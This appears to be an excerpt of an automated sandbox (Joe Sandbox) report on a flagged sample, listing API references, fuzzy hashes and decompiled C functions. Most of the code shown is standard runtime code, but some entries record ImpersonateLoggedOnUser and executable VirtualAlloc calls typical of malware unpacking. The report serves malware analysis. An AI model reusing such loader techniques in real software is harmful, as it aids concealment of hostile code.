                                                control_flow_graph 331 2dc9ed8-2dc9f44 ImpersonateLoggedOnUser 333 2dc9f4d-2dc9f6e 331->333 334 2dc9f46-2dc9f4c 331->334 334->333
                                                APIs
                                                • ImpersonateLoggedOnUser.KERNELBASE ref: 02DC9F37
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.369243494.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_2dc0000_ns5251Ks.jbxd
                                                Similarity
                                                • API ID: ImpersonateLoggedUser
                                                • String ID:
                                                • API String ID: 2216092060-0
                                                • Opcode ID: 9f5a8f7cebaa49857808cf46c293909240b85fdaaee0f698272fcdb6c17fc1b1
                                                • Instruction ID: de28f36cbaf1c113405f5d3688419d2aa9f164cf4661be77453f776b7c82b822
                                                • Opcode Fuzzy Hash: 9f5a8f7cebaa49857808cf46c293909240b85fdaaee0f698272fcdb6c17fc1b1
                                                • Instruction Fuzzy Hash: 711106B1900659CFDB10CF9AD544BEEFBF4EB48324F24846AD458A3340D378A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 326 2dc9cc8-2dc9d34 FindCloseChangeNotification 328 2dc9d3d-2dc9d5e 326->328 329 2dc9d36-2dc9d3c 326->329 329->328
                                                APIs
                                                • FindCloseChangeNotification.KERNELBASE ref: 02DC9D27
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.369243494.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_2dc0000_ns5251Ks.jbxd
                                                Similarity
                                                • API ID: ChangeCloseFindNotification
                                                • String ID:
                                                • API String ID: 2591292051-0
                                                • Opcode ID: df3d162ec916fbcea85b20b0436b46691bc7f7412c643515a2a936b49ba5d70c
                                                • Instruction ID: de1ba98f0cf5942bf5188c27cfc982ffa833f17116a9dac60ce09313f639cb41
                                                • Opcode Fuzzy Hash: df3d162ec916fbcea85b20b0436b46691bc7f7412c643515a2a936b49ba5d70c
                                                • Instruction Fuzzy Hash: C01103B19006098FDB10CF9AD984BEEFBF4EB48324F24846AD458B3340D378A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 416 40d534-40d556 HeapCreate 417 40d558-40d559 416->417 418 40d55a-40d563 416->418
                                                C-Code - Quality: 100%
                                                			E0040D534(intOrPtr _a4) {
                                                				void* _t6;
                                                
                                                				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                				 *0x4234b4 = _t6;
                                                				if(_t6 != 0) {
                                                					 *0x4250b0 = 1;
                                                					return 1;
                                                				} else {
                                                					return _t6;
                                                				}
                                                			}




                                                0x0040d549
                                                0x0040d54f
                                                0x0040d556
                                                0x0040d55d
                                                0x0040d563
                                                0x0040d559
                                                0x0040d559
                                                0x0040d559

                                                APIs
                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateHeap
                                                • String ID:
                                                • API String ID: 10892065-0
                                                • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 25%
                                                			E0040EA0A(intOrPtr _a4) {
                                                				void* __ebp;
                                                				void* _t2;
                                                				void* _t3;
                                                				void* _t4;
                                                				void* _t5;
                                                				void* _t8;
                                                
                                                				_push(0);
                                                				_push(0);
                                                				_push(_a4);
                                                				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
                                                				return _t2;
                                                			}









                                                0x0040ea0f
                                                0x0040ea11
                                                0x0040ea13
                                                0x0040ea16
                                                0x0040ea1f

                                                APIs
                                                • _doexit.LIBCMT ref: 0040EA16
                                                  • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                  • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                  • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __decode_pointer$__initterm$__lock_doexit
                                                • String ID:
                                                • API String ID: 1597249276-0
                                                • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02E17476
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.369287641.0000000002E16000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E16000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_2e16000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction ID: 5bd40365b7727dc81fad74d74d9f24ceb6c930df99464b2ca2274f164d59be8c
                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction Fuzzy Hash: D6112779A40208EFDB01DF98C985E99BFF5AF08751F0580A4F9889B361D375EA90DF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                				intOrPtr _v0;
                                                				void* _v804;
                                                				intOrPtr _v808;
                                                				intOrPtr _v812;
                                                				intOrPtr _t6;
                                                				intOrPtr _t11;
                                                				intOrPtr _t12;
                                                				intOrPtr _t13;
                                                				long _t17;
                                                				intOrPtr _t21;
                                                				intOrPtr _t22;
                                                				intOrPtr _t25;
                                                				intOrPtr _t26;
                                                				intOrPtr _t27;
                                                				intOrPtr* _t31;
                                                				void* _t34;
                                                
                                                				_t27 = __esi;
                                                				_t26 = __edi;
                                                				_t25 = __edx;
                                                				_t22 = __ecx;
                                                				_t21 = __ebx;
                                                				_t6 = __eax;
                                                				_t34 = _t22 -  *0x422234; // 0x7db36a59
                                                				if(_t34 == 0) {
                                                					asm("repe ret");
                                                				}
                                                				 *0x423b98 = _t6;
                                                				 *0x423b94 = _t22;
                                                				 *0x423b90 = _t25;
                                                				 *0x423b8c = _t21;
                                                				 *0x423b88 = _t27;
                                                				 *0x423b84 = _t26;
                                                				 *0x423bb0 = ss;
                                                				 *0x423ba4 = cs;
                                                				 *0x423b80 = ds;
                                                				 *0x423b7c = es;
                                                				 *0x423b78 = fs;
                                                				 *0x423b74 = gs;
                                                				asm("pushfd");
                                                				_pop( *0x423ba8);
                                                				 *0x423b9c =  *_t31;
                                                				 *0x423ba0 = _v0;
                                                				 *0x423bac =  &_a4;
                                                				 *0x423ae8 = 0x10001;
                                                				_t11 =  *0x423ba0; // 0x0
                                                				 *0x423a9c = _t11;
                                                				 *0x423a90 = 0xc0000409;
                                                				 *0x423a94 = 1;
                                                				_t12 =  *0x422234; // 0x7db36a59
                                                				_v812 = _t12;
                                                				_t13 =  *0x422238; // 0x824c95a6
                                                				_v808 = _t13;
                                                				 *0x423ae0 = IsDebuggerPresent();
                                                				_push(1);
                                                				E004138FC(_t14);
                                                				SetUnhandledExceptionFilter(0);
                                                				_t17 = UnhandledExceptionFilter(0x41fb80);
                                                				if( *0x423ae0 == 0) {
                                                					_push(1);
                                                					E004138FC(_t17);
                                                				}
                                                				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                			}



















                                                0x0040ce09
                                                0x0040ce09
                                                0x0040ce09
                                                0x0040ce09
                                                0x0040ce09
                                                0x0040ce09
                                                0x0040ce09
                                                0x0040ce0f
                                                0x0040ce11
                                                0x0040ce11
                                                0x00413644
                                                0x00413649
                                                0x0041364f
                                                0x00413655
                                                0x0041365b
                                                0x00413661
                                                0x00413667
                                                0x0041366e
                                                0x00413675
                                                0x0041367c
                                                0x00413683
                                                0x0041368a
                                                0x00413691
                                                0x00413692
                                                0x0041369b
                                                0x004136a3
                                                0x004136ab
                                                0x004136b6
                                                0x004136c0
                                                0x004136c5
                                                0x004136ca
                                                0x004136d4
                                                0x004136de
                                                0x004136e3
                                                0x004136e9
                                                0x004136ee
                                                0x004136fa
                                                0x004136ff
                                                0x00413701
                                                0x00413709
                                                0x00413714
                                                0x00413721
                                                0x00413723
                                                0x00413725
                                                0x0041372a
                                                0x0041373e

                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                • String ID:
                                                • API String ID: 2579439406-0
                                                • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040ADB0(intOrPtr* __ecx) {
                                                				void* _t5;
                                                				intOrPtr* _t11;
                                                
                                                				_t11 = __ecx;
                                                				_t5 =  *(__ecx + 8);
                                                				 *__ecx = 0x41eff0;
                                                				if(_t5 != 0) {
                                                					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                                                				}
                                                				if( *(_t11 + 0xc) != 0) {
                                                					_t5 = GetProcessHeap();
                                                					if(_t5 != 0) {
                                                						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                                                					}
                                                				}
                                                				return _t5;
                                                			}





                                                0x0040adb3
                                                0x0040adb5
                                                0x0040adb8
                                                0x0040adc0
                                                0x0040adc8
                                                0x0040adc8
                                                0x0040adce
                                                0x0040add0
                                                0x0040add8
                                                0x00000000
                                                0x0040ade1
                                                0x0040add8
                                                0x0040ade8

                                                APIs
                                                • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$FreeProcess
                                                • String ID:
                                                • API String ID: 3859560861-0
                                                • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.369287641.0000000002E16000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E16000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_2e16000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                • Instruction ID: be45233d9bf1d9c6031c2441f70be14e5151eb5977f72f8c823427a28c1c351f
                                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                • Instruction Fuzzy Hash: E51182723802009FD754DF65DC80FA6B3EAFB89724B1980A5ED08CB356D775E841C760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                                                				signed int _v8;
                                                				int _v12;
                                                				int _v16;
                                                				int _v20;
                                                				intOrPtr _v24;
                                                				void* _v36;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t110;
                                                				intOrPtr _t112;
                                                				intOrPtr _t113;
                                                				short* _t115;
                                                				short* _t116;
                                                				char* _t120;
                                                				short* _t121;
                                                				short* _t123;
                                                				short* _t127;
                                                				int _t128;
                                                				short* _t141;
                                                				signed int _t144;
                                                				void* _t146;
                                                				short* _t147;
                                                				signed int _t150;
                                                				short* _t153;
                                                				char* _t157;
                                                				int _t160;
                                                				long _t162;
                                                				signed int _t174;
                                                				signed int _t178;
                                                				signed int _t179;
                                                				int _t182;
                                                				short* _t184;
                                                				signed int _t186;
                                                				signed int _t188;
                                                				short* _t189;
                                                				int _t191;
                                                				intOrPtr _t194;
                                                				int _t207;
                                                
                                                				_t110 =  *0x422234; // 0x7db36a59
                                                				_v8 = _t110 ^ _t188;
                                                				_t184 = __ecx;
                                                				_t194 =  *0x423e7c; // 0x1
                                                				if(_t194 == 0) {
                                                					_t182 = 1;
                                                					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                                                						_t162 = GetLastError();
                                                						__eflags = _t162 - 0x78;
                                                						if(_t162 == 0x78) {
                                                							 *0x423e7c = 2;
                                                						}
                                                					} else {
                                                						 *0x423e7c = 1;
                                                					}
                                                				}
                                                				if(_a16 <= 0) {
                                                					L13:
                                                					_t112 =  *0x423e7c; // 0x1
                                                					if(_t112 == 2 || _t112 == 0) {
                                                						_v16 = 0;
                                                						_v20 = 0;
                                                						__eflags = _a4;
                                                						if(_a4 == 0) {
                                                							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                                                						}
                                                						__eflags = _a28;
                                                						if(_a28 == 0) {
                                                							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                						}
                                                						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
                                                						_v24 = _t113;
                                                						__eflags = _t113 - 0xffffffff;
                                                						if(_t113 != 0xffffffff) {
                                                							__eflags = _t113 - _a28;
                                                							if(_t113 == _a28) {
                                                								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                								L78:
                                                								__eflags = _v16;
                                                								if(__eflags != 0) {
                                                									_push(_v16);
                                                									E0040B6B5(0, _t182, _t184, __eflags);
                                                								}
                                                								_t115 = _v20;
                                                								__eflags = _t115;
                                                								if(_t115 != 0) {
                                                									__eflags = _a20 - _t115;
                                                									if(__eflags != 0) {
                                                										_push(_t115);
                                                										E0040B6B5(0, _t182, _t184, __eflags);
                                                									}
                                                								}
                                                								_t116 = _t184;
                                                								goto L84;
                                                							}
                                                							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                                                							_t191 =  &(_t189[0xc]);
                                                							_v16 = _t120;
                                                							__eflags = _t120;
                                                							if(_t120 == 0) {
                                                								goto L58;
                                                							}
                                                							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                                                							_v12 = _t121;
                                                							__eflags = _t121;
                                                							if(__eflags != 0) {
                                                								if(__eflags <= 0) {
                                                									L71:
                                                									_t182 = 0;
                                                									__eflags = 0;
                                                									L72:
                                                									__eflags = _t182;
                                                									if(_t182 == 0) {
                                                										goto L62;
                                                									}
                                                									E0040BA30(_t182, _t182, 0, _v12);
                                                									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                                                									_v12 = _t123;
                                                									__eflags = _t123;
                                                									if(_t123 != 0) {
                                                										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                                                										_v20 = _t186;
                                                										asm("sbb esi, esi");
                                                										_t184 =  ~_t186 & _v12;
                                                										__eflags = _t184;
                                                									} else {
                                                										_t184 = 0;
                                                									}
                                                									E004147AE(_t182);
                                                									goto L78;
                                                								}
                                                								__eflags = _t121 - 0xffffffe0;
                                                								if(_t121 > 0xffffffe0) {
                                                									goto L71;
                                                								}
                                                								_t127 =  &(_t121[4]);
                                                								__eflags = _t127 - 0x400;
                                                								if(_t127 > 0x400) {
                                                									_t128 = E0040B84D(0, _t179, _t182, _t127);
                                                									__eflags = _t128;
                                                									if(_t128 != 0) {
                                                										 *_t128 = 0xdddd;
                                                										_t128 = _t128 + 8;
                                                										__eflags = _t128;
                                                									}
                                                									_t182 = _t128;
                                                									goto L72;
                                                								}
                                                								E0040CFB0(_t127);
                                                								_t182 = _t191;
                                                								__eflags = _t182;
                                                								if(_t182 == 0) {
                                                									goto L62;
                                                								}
                                                								 *_t182 = 0xcccc;
                                                								_t182 = _t182 + 8;
                                                								goto L72;
                                                							}
                                                							L62:
                                                							_t184 = 0;
                                                							goto L78;
                                                						} else {
                                                							goto L58;
                                                						}
                                                					} else {
                                                						if(_t112 != 1) {
                                                							L58:
                                                							_t116 = 0;
                                                							L84:
                                                							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                                                						}
                                                						_v12 = 0;
                                                						if(_a28 == 0) {
                                                							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                						}
                                                						_t184 = MultiByteToWideChar;
                                                						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                						_t207 = _t182;
                                                						if(_t207 == 0) {
                                                							goto L58;
                                                						} else {
                                                							if(_t207 <= 0) {
                                                								L28:
                                                								_v16 = 0;
                                                								L29:
                                                								if(_v16 == 0) {
                                                									goto L58;
                                                								}
                                                								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                                                									L52:
                                                									E004147AE(_v16);
                                                									_t116 = _v12;
                                                									goto L84;
                                                								}
                                                								_t184 = LCMapStringW;
                                                								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                                                								_v12 = _t174;
                                                								if(_t174 == 0) {
                                                									goto L52;
                                                								}
                                                								if((_a8 & 0x00000400) == 0) {
                                                									__eflags = _t174;
                                                									if(_t174 <= 0) {
                                                										L44:
                                                										_t184 = 0;
                                                										__eflags = 0;
                                                										L45:
                                                										__eflags = _t184;
                                                										if(_t184 != 0) {
                                                											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                                                											__eflags = _t141;
                                                											if(_t141 != 0) {
                                                												_push(0);
                                                												_push(0);
                                                												__eflags = _a24;
                                                												if(_a24 != 0) {
                                                													_push(_a24);
                                                													_push(_a20);
                                                												} else {
                                                													_push(0);
                                                													_push(0);
                                                												}
                                                												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                                                											}
                                                											E004147AE(_t184);
                                                										}
                                                										goto L52;
                                                									}
                                                									_t144 = 0xffffffe0;
                                                									_t179 = _t144 % _t174;
                                                									__eflags = _t144 / _t174 - 2;
                                                									if(_t144 / _t174 < 2) {
                                                										goto L44;
                                                									}
                                                									_t52 = _t174 + 8; // 0x8
                                                									_t146 = _t174 + _t52;
                                                									__eflags = _t146 - 0x400;
                                                									if(_t146 > 0x400) {
                                                										_t147 = E0040B84D(0, _t179, _t182, _t146);
                                                										__eflags = _t147;
                                                										if(_t147 != 0) {
                                                											 *_t147 = 0xdddd;
                                                											_t147 =  &(_t147[4]);
                                                											__eflags = _t147;
                                                										}
                                                										_t184 = _t147;
                                                										goto L45;
                                                									}
                                                									E0040CFB0(_t146);
                                                									_t184 = _t189;
                                                									__eflags = _t184;
                                                									if(_t184 == 0) {
                                                										goto L52;
                                                									}
                                                									 *_t184 = 0xcccc;
                                                									_t184 =  &(_t184[4]);
                                                									goto L45;
                                                								}
                                                								if(_a24 != 0 && _t174 <= _a24) {
                                                									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                                                								}
                                                								goto L52;
                                                							}
                                                							_t150 = 0xffffffe0;
                                                							_t179 = _t150 % _t182;
                                                							if(_t150 / _t182 < 2) {
                                                								goto L28;
                                                							}
                                                							_t25 = _t182 + 8; // 0x8
                                                							_t152 = _t182 + _t25;
                                                							if(_t182 + _t25 > 0x400) {
                                                								_t153 = E0040B84D(0, _t179, _t182, _t152);
                                                								__eflags = _t153;
                                                								if(_t153 == 0) {
                                                									L27:
                                                									_v16 = _t153;
                                                									goto L29;
                                                								}
                                                								 *_t153 = 0xdddd;
                                                								L26:
                                                								_t153 =  &(_t153[4]);
                                                								goto L27;
                                                							}
                                                							E0040CFB0(_t152);
                                                							_t153 = _t189;
                                                							if(_t153 == 0) {
                                                								goto L27;
                                                							}
                                                							 *_t153 = 0xcccc;
                                                							goto L26;
                                                						}
                                                					}
                                                				}
                                                				_t178 = _a16;
                                                				_t157 = _a12;
                                                				while(1) {
                                                					_t178 = _t178 - 1;
                                                					if( *_t157 == 0) {
                                                						break;
                                                					}
                                                					_t157 =  &(_t157[1]);
                                                					if(_t178 != 0) {
                                                						continue;
                                                					}
                                                					_t178 = _t178 | 0xffffffff;
                                                					break;
                                                				}
                                                				_t160 = _a16 - _t178 - 1;
                                                				if(_t160 < _a16) {
                                                					_t160 = _t160 + 1;
                                                				}
                                                				_a16 = _t160;
                                                				goto L13;
                                                			}











































                                                0x00417089
                                                0x00417090
                                                0x00417098
                                                0x0041709a
                                                0x004170a0
                                                0x004170a6
                                                0x004170bb
                                                0x004170c5
                                                0x004170cb
                                                0x004170ce
                                                0x004170d0
                                                0x004170d0
                                                0x004170bd
                                                0x004170bd
                                                0x004170bd
                                                0x004170bb
                                                0x004170dd
                                                0x00417101
                                                0x00417101
                                                0x00417109
                                                0x004172bb
                                                0x004172be
                                                0x004172c1
                                                0x004172c4
                                                0x004172cb
                                                0x004172cb
                                                0x004172ce
                                                0x004172d1
                                                0x004172d8
                                                0x004172d8
                                                0x004172de
                                                0x004172e4
                                                0x004172e7
                                                0x004172ea
                                                0x004172f3
                                                0x004172f6
                                                0x004173ef
                                                0x004173f1
                                                0x004173f1
                                                0x004173f4
                                                0x004173f6
                                                0x004173f9
                                                0x004173fe
                                                0x004173ff
                                                0x00417402
                                                0x00417404
                                                0x00417406
                                                0x00417409
                                                0x0041740b
                                                0x0041740c
                                                0x00417411
                                                0x00417409
                                                0x00417412
                                                0x00000000
                                                0x00417412
                                                0x00417309
                                                0x0041730e
                                                0x00417311
                                                0x00417314
                                                0x00417316
                                                0x00000000
                                                0x00000000
                                                0x0041732a
                                                0x0041732c
                                                0x0041732f
                                                0x00417331
                                                0x0041733a
                                                0x00417379
                                                0x00417379
                                                0x00417379
                                                0x0041737b
                                                0x0041737b
                                                0x0041737d
                                                0x00000000
                                                0x00000000
                                                0x00417384
                                                0x0041739c
                                                0x0041739e
                                                0x004173a1
                                                0x004173a3
                                                0x004173bf
                                                0x004173c1
                                                0x004173c9
                                                0x004173cb
                                                0x004173cb
                                                0x004173a5
                                                0x004173a5
                                                0x004173a5
                                                0x004173cf
                                                0x00000000
                                                0x004173d4
                                                0x0041733c
                                                0x0041733f
                                                0x00000000
                                                0x00000000
                                                0x00417341
                                                0x00417344
                                                0x00417349
                                                0x00417362
                                                0x00417368
                                                0x0041736a
                                                0x0041736c
                                                0x00417372
                                                0x00417372
                                                0x00417372
                                                0x00417375
                                                0x00000000
                                                0x00417375
                                                0x0041734b
                                                0x00417350
                                                0x00417352
                                                0x00417354
                                                0x00000000
                                                0x00000000
                                                0x00417356
                                                0x0041735c
                                                0x00000000
                                                0x0041735c
                                                0x00417333
                                                0x00417333
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00417117
                                                0x0041711a
                                                0x004172ec
                                                0x004172ec
                                                0x00417414
                                                0x00417425
                                                0x00417425
                                                0x00417120
                                                0x00417126
                                                0x0041712d
                                                0x0041712d
                                                0x00417130
                                                0x00417153
                                                0x00417155
                                                0x00417157
                                                0x00000000
                                                0x0041715d
                                                0x0041715d
                                                0x004171a2
                                                0x004171a2
                                                0x004171a5
                                                0x004171a8
                                                0x00000000
                                                0x00000000
                                                0x004171c1
                                                0x004172aa
                                                0x004172ad
                                                0x004172b2
                                                0x00000000
                                                0x004172b5
                                                0x004171c7
                                                0x004171db
                                                0x004171dd
                                                0x004171e2
                                                0x00000000
                                                0x00000000
                                                0x004171ef
                                                0x0041721a
                                                0x0041721c
                                                0x00417263
                                                0x00417263
                                                0x00417263
                                                0x00417265
                                                0x00417265
                                                0x00417267
                                                0x00417277
                                                0x0041727d
                                                0x0041727f
                                                0x00417281
                                                0x00417282
                                                0x00417283
                                                0x00417286
                                                0x0041728c
                                                0x0041728f
                                                0x00417288
                                                0x00417288
                                                0x00417289
                                                0x00417289
                                                0x004172a0
                                                0x004172a0
                                                0x004172a4
                                                0x004172a9
                                                0x00000000
                                                0x00417267
                                                0x00417222
                                                0x00417223
                                                0x00417225
                                                0x00417228
                                                0x00000000
                                                0x00000000
                                                0x0041722a
                                                0x0041722a
                                                0x0041722e
                                                0x00417233
                                                0x0041724c
                                                0x00417252
                                                0x00417254
                                                0x00417256
                                                0x0041725c
                                                0x0041725c
                                                0x0041725c
                                                0x0041725f
                                                0x00000000
                                                0x0041725f
                                                0x00417235
                                                0x0041723a
                                                0x0041723c
                                                0x0041723e
                                                0x00000000
                                                0x00000000
                                                0x00417240
                                                0x00417246
                                                0x00000000
                                                0x00417246
                                                0x004171f4
                                                0x00417213
                                                0x00417213
                                                0x00000000
                                                0x004171f4
                                                0x00417163
                                                0x00417164
                                                0x00417169
                                                0x00000000
                                                0x00000000
                                                0x0041716b
                                                0x0041716b
                                                0x00417174
                                                0x0041718a
                                                0x00417190
                                                0x00417192
                                                0x0041719d
                                                0x0041719d
                                                0x00000000
                                                0x0041719d
                                                0x00417194
                                                0x0041719a
                                                0x0041719a
                                                0x00000000
                                                0x0041719a
                                                0x00417176
                                                0x0041717b
                                                0x0041717f
                                                0x00000000
                                                0x00000000
                                                0x00417181
                                                0x00000000
                                                0x00417181
                                                0x00417157
                                                0x00417109
                                                0x004170df
                                                0x004170e2
                                                0x004170e5
                                                0x004170e5
                                                0x004170e8
                                                0x00000000
                                                0x00000000
                                                0x004170ea
